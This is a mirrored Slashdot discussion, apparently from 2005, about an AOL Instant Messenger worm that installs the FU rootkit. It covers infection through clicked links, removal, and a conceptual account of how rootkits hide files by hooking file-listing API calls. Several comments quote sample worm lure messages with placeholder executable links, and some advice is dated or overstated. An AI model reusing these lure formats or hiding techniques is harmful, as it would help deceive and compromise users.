Slashdot Mirror
Worm With Rootkit Package Loose On AIM
Mr0624 writes "According to a recent article on C|Net a new worm is swiftly spreading via AIM to many computers. It delivers a brutal root-kit which bypasses security software and takes control of a PC." From the article: "The worm was spotted in an AOL IM chatroom and infected one of the PCs that FaceTime uses for worm bait. The company said it also has seen the pest hit other computers. 'It is still out there, and it is definitely something the user should be leery of ... The rootkit is designed to not be detected, and that is the scary part.'"
I suppose that anyone in the computer tech/repair shop industry might appreciate tools like Rootkit Revealer right now.
Hopefully Microsoft's project that hasn't been released yet will show up soon. They also have a few hints to detect rootkits installed on a system including two Slashdot links.
Hooray for AOL.
"What do you despise? By this are you truly known." --Princess Irulan, Manual of Muad'Dib
/)
This is actually pretty old news, one of my friends got this a few weeks ago (he's not a geek, and he called me because I build this custom pc for him). It's quite easy to fix though, a good Ol' system restore fixes it, and there are many programs that can search for, and delete rootkit and other trojans (i'm talking about other programs besides antivirus programs, which sometimes have a hard time deleting these buggers). The trojan was called directX.exe, found in windows/system32 folder. My suggestion: don't click on a link from a friend before 1) you know what it is 2) and make sure that it doesn't say that your downloading a video file, when it's obviously a batch or exe file. This virus is not really a big deal, you just have to have half a brain to deal with it.
public class null extends java applet { System.out.print ("Tabula Rasa"); }
Considering the rootkit is spread by users clicking links and has NOTHING at all to do with the protocol, I'd have to go ahead and have to say yeah, it can spread via any client that lets you click on links and I'd also have to say RTFA
Monstar L
http://www.jayloden.com/VirusClean.htm
This tool is updated almost daily. 100% effective, I can vouch for it. You can become infected if you click the link on non-AIM clients, but it won't spread to everyone else on your buddylist.
Assuming you're on a Windows operating system.
Use of GAIM will only prevent propagation of this worm. There are more levels at play here.
The worm is actually installed from a link you would click on from an infected IM. Nothing fancy here, it's just a simple HTML link. Clicking on this link will call up your web browser. What happens here depends on both the browser, patches, browser settings, and you. In IE, it's likely that the executable will just run it. Or, ask you to download/run said file. The latter true for Firefox or Opera as well as IE.
In any case, if your computer runs this executable, the computer in infected and it's game over. BUT, you won't be spreading the worm to others since you're using GAIM. The spreading of the worm depends on the AIM (or AOL?) client running on the computer.
That is until the worm writers also write for GAIM.
AnamanFan - Trying to find the Truth, one post at a time.
Actually, rootkits go out of their way to be undetected.
(Shamelessly stolen from grc.com)
"What happens is, they essentially modify the way the OS itself works. They're compromising the operating system kernel. You know, in operating system terminology we have the notion of a kernel, which is the OS core. And then you've got applications which run as sort of clients of that operating system. So a program you're running, you know, Corel Draw or Outlook or whatever, that's a client of the operating system. Well, so are the spyware scanners. So when you're running even a spyware scanner, it's saying to the operating system - in fact, for example, there are two API calls that's "find first file" and "find next file." So if you ever want to, like, do a directory listing, you'll say "find first file *.*," and it gives you the first file. And then you successively call "find next," "find next," "find next," until it returns no more files. That's all there is to it. So that's - so anything that's scanning your system is basically doing that.
Well, imagine if something altered the way the "find first" and "find next" operated, so that it was intercepting the response back to you, out of the operating system, back to any application that was asking, so that if it was about to report one of its own files, it would call - it would say, whoops, and call "find next" again on your behalf, skipping over that file. Suddenly any program running on the operating system will not see any of those stealthed, rootkitted files. They just disappear. "
link
http://www.grc.com/sn/SN-009.htm
How many people still use .com files anyway?
Yahoo.com, Google.com, Fark.com, News.com.com... Windows stores Internet shortcuts in files with the .url suffix, but even when you have "hide file extensions" turned off, Windows still hides the .url suffix, making it nearly impossible to distinguish Google.com from Google.com.url in icon view and difficult in any other view. The little arrow in the corner doesn't mean much, as the Google.com file could contain an icon with the arrow already drawn inside.
Due to poor software design, it's difficult to not run ad admin. Most programs run no problem, be some, like WinAMP, need to have their directory permissions changed to run and a non-admin. While this isn't a problem for power users, most users won't even know how to change the permissions (in XP Home you need to boot into safe mode to get the security tab to appear in the file properties windows)
Despite the fact that the \Documents and Settings\username folder exists, some developers choose not to use it, and that causes problems.
Or... just tell people not to download crap from 'teh interweb'.
Web2.0: I love when people Flickr my cuil and digg my boingboing until my google is reddit and I start to yahoo
Right then, well, "System Restore" is a feature of Windows XP that snapshots the status of a whole bucketload of system settings, DLLS, etc... each time you update software, and at other times determined by the system, these snapshots are taken. You can go into system restore and revert to your system status from yesterday, last week, or just before oyu installed something, and it generally works very well (meaning quickly, reliably, and doesn't erase your data.) It doens't make a mess, either.
It was a very surprisingly well done feature, I can't actually believe it came from MS
Some windows viruses do run under WINE. However, they do not affect the system to the extent that windows viruses affect windows systems. They RUN, but mostly nothing else happens other than wasting CPU cycles.
/. before.4 30222&from=rss
I think this was posted on
http://os.newsforge.com/article.pl?sid=05/01/25/1
In the case of AIM, I am pretty sure you have to click a link. And I stand by my opinion, regardless of what the moderators think :)
Actually it's much worse.
:o(
Administrator privs on windows is pretty much "root" as far as users are concerned *but* there is a higher level of privs. The SYSTEM user, which has a complete control (iirc, and I might not cos it's 4:30am here) it's near enough acting like the operating system as makes no difference.
rootkits tend to get themselves to SYSTEM privs
I had a rootkit last month. Nothing could get rid of it but a full fdisk/mbr where I lost everything. It was MBR based and would append itself when running windows which made it nearly impossible to delete.
It's 2005 and you only tried FDisk? There's a number of free boot record editors that could have fixed anything. There is no rootkit that I know of that is based out of the MBR the way the old Pakistani virus did to Apples. If I have a customer who needs data recovered off a rootkit infected computer I put it in as a slave in a WXP or W2K system.
They're COM files - the worm has been going around my town for about a week and a half.
It's usually a link with something like "HEY CHECK OUT THIS PICTURE OF ME - LOLZ!! http://shittywebpage.com/funny.com"
Since most people don't know that an COM file is executable they download and run it.
Unlike the idiots usin AIM who've been hit with this.
Yes, since everyone who doesn't know everything about a file extension not really in common use for many years is an idiot. Plus Windows hides extensions by default, which really doesn't help the problem.
-Glitch "We all know Linux is great...it does infinite loops in 5 seconds." - Linus Torvalds
This looks like the same worm a friend of mine got a few weeks ago. I loaded it up in VMWare and discovered that it installed, among other things, the "FU" rootkit.
I took a rootkit class at this year's Black Hat Training from the guy who wrote FU. He pointed out that it's more of a proof-of-concept rootkit. It does allow you to hide files, registry keys and drivers from both user-mode and kernel-mode processes, but, it really doesn't go out of its way to hide itself from every possible angle, so detection (and thankfully, removal) wasn't that bad.
I was able to whip up a little app to fix it from within Windows. But had the worm's author actually expanded on FU's techniques and done a better job of hiding the rootkit, recovery would not have been as nearly as easy. (Just imagine how much fun would it be to talk a novice through Windows XP's Recovery Console!)
Once the worm authors start to get better at exploiting the potential of rootkits, we've definitely got a much better problem on our hands. The old "1. get infected, 2. run anti-virus to disinfect, 3. repeat" cycle just won't work anymore. Good luck even finding a well-implemented rootkit once it's in your kernel, let alone trying to clean it up while it's effectively able to veto every action you take.
(Yet another reason why no Windows user should run as an Administrator.)
"Power corrupts, and absolute power corrupts absolutely." -- Lord Acton
Yes. Even though its likely GAIM won't spread it, you'll still to get some spyware.
o jans/cool.com)
Incase you haven't seen any instances where someone is infected the messages are usually similar to
Wow! (http://genericwebhosting.com/XxXILikeSpreadingTr
or
Check this out! (http://genericblog.com/picture01.exe)
which can only be so obvious, but, then again, the mainstream instant messaging crowds are full of dumbasses.
IE: The worm is a compact, surreptitious BT/Kademlia client.
:p
Took me a second to realize that "IE" meant "id est" and not Internet Explorer. And "id est" means "that is," not "for example," also known as e.g. (exempli gratia).
Handy cheat sheet:
i.e. = id est = that is (not commonly captitalized, or puncuated as an acronym like IE)
e.g. = exempli gratia = for example
There's your pendantic lesson of the day
How did you know that it didn't dial home? You said you had no security and no anti-virus, and that you were running natd/ipfw. Perhaps if you were also running some intrusion detection software on the firewall, or had an application-level firewall, you might actually be able to say "did not create any network traffic"? What were doing to make this assertion? Watching the blinkenlights on the hub?
The perfect virus (nowadays) does the following:
Don't have any programs, I MEAN ANY, which automatically run any sort of executable. That's just asking for it.
You truely are an idiot. ALL programs can do this. It's a basic part of how programs work, they make calls to other programs! The question is, can they be made to run malware through either bad design or exploit (e.g. buffer overflow). There is NOTHING you can do against the latter. Even the infalible Firefox is currently on v1.07 because of EXPLOITS in older versions.
The only system I can think of that can stop apps running system commands is Java. You don't seem like the Java type somehow though.
"Don't use your firewall to do your job for you. Shut off the services you don't need."
That's IN ADDITION to a firewall. NEVER rely on software on your PC to sort out what you have open. A virus can easilly (silently) restart a service, and you'd NEVER know. Likewise with "personal firewalls". The firewall should be a different box with different accounts. If you are truely paranoid, never enter it's password on a potentially hacked machine and stick to console access only.
I hope you are running security for anything important...